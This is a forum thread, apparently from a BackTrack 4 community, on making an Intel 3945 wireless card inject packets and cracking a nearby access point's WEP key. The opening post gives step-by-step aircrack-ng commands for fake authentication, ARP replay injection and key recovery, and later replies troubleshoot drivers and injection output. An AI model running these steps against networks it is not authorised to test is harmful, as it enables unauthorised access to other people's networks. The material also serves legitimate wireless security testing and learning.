HOW TO: iwl3945 BackTrack 4

[stuball]

Right, I spent ages trying to get this to work, following various tutorials and I eventually managed to get it working... Very well in fact, 64 bit wep in <2mins.

The most important part ends after "ifconfig wifi0 up" because at that point your iwl3945 is ready to inject, after that its a fake auth WEP attack, but it should work nonetheless.

1. type iwconfig, it should show you eth0, eth1 and wlan0

2. airodump-ng wlan0 and note down the BSSID(MAC) and channel of the AP you want to attack, then ctrl+c to quit it.

3. Configure your card to use ipwraw:

Install:
wget hxxp://dl.aircrack-ng.org/drivers/ipwraw-ng-2.3.4-04022008.tar.bz2
tar -xjf ipwraw-ng-2.3.4-04022008.tar.bz2
cd ipwraw-ng*
make
make install_ucode
make install

Use:
modprobe -r iwl3945
modprobe ipwraw

Configure:

ifconfig wifi0 down

We need to edit a few files, i find nano to be the easiest editor, ctrl+o saves a file, and ctrl+x exits.

Change the below file to the AP BSSID
nano /sys/class/net/wifi0/device/bssid

Change the below file to the AP's Channel
nano /sys/class/net/wifi0/device/channel

Change the value from 108 to 2
nano /sys/class/net/wifi0/device/rate

ifconfig wifi0 up

Right, thats your card set for injection! It actually works!

To crack a wep key using the fake auth method:

airodump-ng -w output.cap rtap0
leave it running and in a new window...

aireplay-ng -1 0 -a APMAChere wifi0
it should try and associate with the access point, you are looking for association successful. in a new window...

aireplay-ng -3 -b APMAChere wifi0
it should start injecting the AP, you are looking for the arp count to rise!
in a new window...

aircrack-ng output*.cap
Select your network from the list... you are looking for key found! you might need to try again as the IV count goes up (hopefully quickly).

This is how I made it work, if anyone knows a quicker/easier way then go for it, none that I found worked for me. This is a mix of a few!
Hope this saves someone some time of encourages them to give it another go.

[g0th4x]

Could this work for 4965agn maybe ?

[thundernode]

The drivers included with backtrack 4 are the most up to date and functional available for the 3945. I'm not sure why you would go through all of that trouble to use outdated drivers.

All that is needed is a simple

Code:

airmon-ng start wifi0

[larryhaja]

ipwraw is outdated. The iwl3945 driver has much better support for injection already built into the driver since kernel 2.6.27. All that is needed is

Code:

# airmon-ng start wlan0

This creates the monitor interface mon0. I would stay away from ipwraw and stick with iwl3945.

[stuball]

Yes I would have to agree, shortly after writing this I found that out for myself... there really is so much info out there on how to get this card to work that is complete rubbish, and what I wrote was a mix of about 4 tutorials. I can't believe I spent hours on this! Anyhoo...

airmon-ng start wlan0
starts mon0 as a monitor interface...

airodump runs on the mon 0 interface, aireplay runs on the wlan0 interface.

One thing that my tutorial may help with is people wissing to use wesside-ng. It doesn't seem like the BT4 built in drivers but runs fine using ipwraw.

Apart form that one saving grace, my efforts were incredibly stupid.... I blame google!

[mbmalone]

Vendor: Intel Corporation
Description: PRO/Wireless 3945ABG [Golan] Network Connection
Module: iwl3945

Working fine, without modifications.

airmon-ng start wlan0

Interface Chipset Driver

wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)

dmesg | grep firmware

iwl3945 0000:02:00.0: firmware: requesting iwlwifi-3945-2.ucode
iwl3945 loaded firmware version 15.28.2.8

[GrayFox.i0n]

Hi...

After the make command i get an error, and i wont be able to compile this drivers......

iwl3945 does not support packet injection... am i wrong?

I am trying this from a live usb system

[PwnStar]

this turned out to be a great work-around as the BT4pf 3945 drivers dont work on channels 12-14 and these ones do so thanks fella

[HanShotFirst]

Seriously, this problem is growing long in the tooth. I have searched high and low and tons of people claim that aireplay-ng works fine just using the iwlwifi drivers. The -9 test is the only thing that works for me. The -3 ARP injection functionality does nothing. I try to install the ipwraw setup and it fails on the make. Apparently neither solution works and I could really use some help, especially getting the iwlwifi drivers to properly perform ARP injection. If you're concerned about security and prefer to PM me that's fine but I really need some direction here...

[Armagedeon]

Hello everyone

Same problem where. same wireless card

Code:

root@bt:~# sudo lshw -C network
  *-network
       description: Ethernet interface
       product: L1 Gigabit Ethernet Adapter
       vendor: Attansic Technology Corp.
       physical id: 0
       bus info: pci@0000:02:00.0
       logical name: eth0
       version: b0
       serial: 00:1e:8c:29:3b:66
       capacity: 1GB/s
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt-fd autonegotiation
       configuration: autonegotiation=on broadcast=yes driver=atl1 driverversion=2.1.3 firmware=N/A latency=0 link=no multicast=yes port=twisted pair
  *-network
       description: Wireless interface
       product: PRO/Wireless 3945ABG [Golan] Network Connection
       vendor: Intel Corporation
       physical id: 0
       bus info: pci@0000:03:00.0
       logical name: wmaster0
       version: 02
       serial: 00:1c:bf:5e:84:3b
       width: 32 bits
       clock: 33MHz
       capabilities: pm msi pciexpress bus_master cap_list logical ethernet physical wireless
       configuration: broadcast=yes driver=iwl3945 ip=XX.XX.XX.XX latency=0 module=iwl3945 multicast=yes wireless=IEEE 802.11abg

Tried it all...

In BT3 ipwraw drivers used to work fine...
In BT4 tried installing them but got erros in the make command.

I tried everything

aireplay-ng -9 wlan0 reports injection capable:

Code:

root@bt:~# aireplay-ng -9 wlan0
23:04:24  Trying broadcast probe requests...
23:04:24  Injection is working!
23:04:26  Found 1 AP

23:04:26  Trying directed probe requests...
23:04:26  00:14:7F:71:76:7F - channel: 1 - 'SpeedTouchD53AD3'
23:04:26  Ping (min/avg/max): 1.239ms/8.870ms/95.915ms Power: -86.96
23:04:26  28/30:  93%

I started to airodump in mon0
aireplay-ng -1 and aireplay-ng -3 in wlan0

I wait for a while and get an ARP packet, it then starts to send thousands of packets but but ARP count and Data count remain the same (low)

Code:

root@bt:~# aireplay-ng -3 -b 00:24:B2:79:86:82 -h 00:16:44:F9:7E:32 wlan0
00:26:52  Waiting for beacon frame (BSSID: 00:24:B2:79:86:82) on channel 6
Saving ARP requests in replay_arp-0128-002652.cap
You should also start airodump-ng to capture replies.
Read 46916 packets (got 1 ARP requests and 14 ACKs), sent 189395 packets...(499 pps)

I've pass through all the steps reported where and still can't get injection...

Can anyone help???

Thanks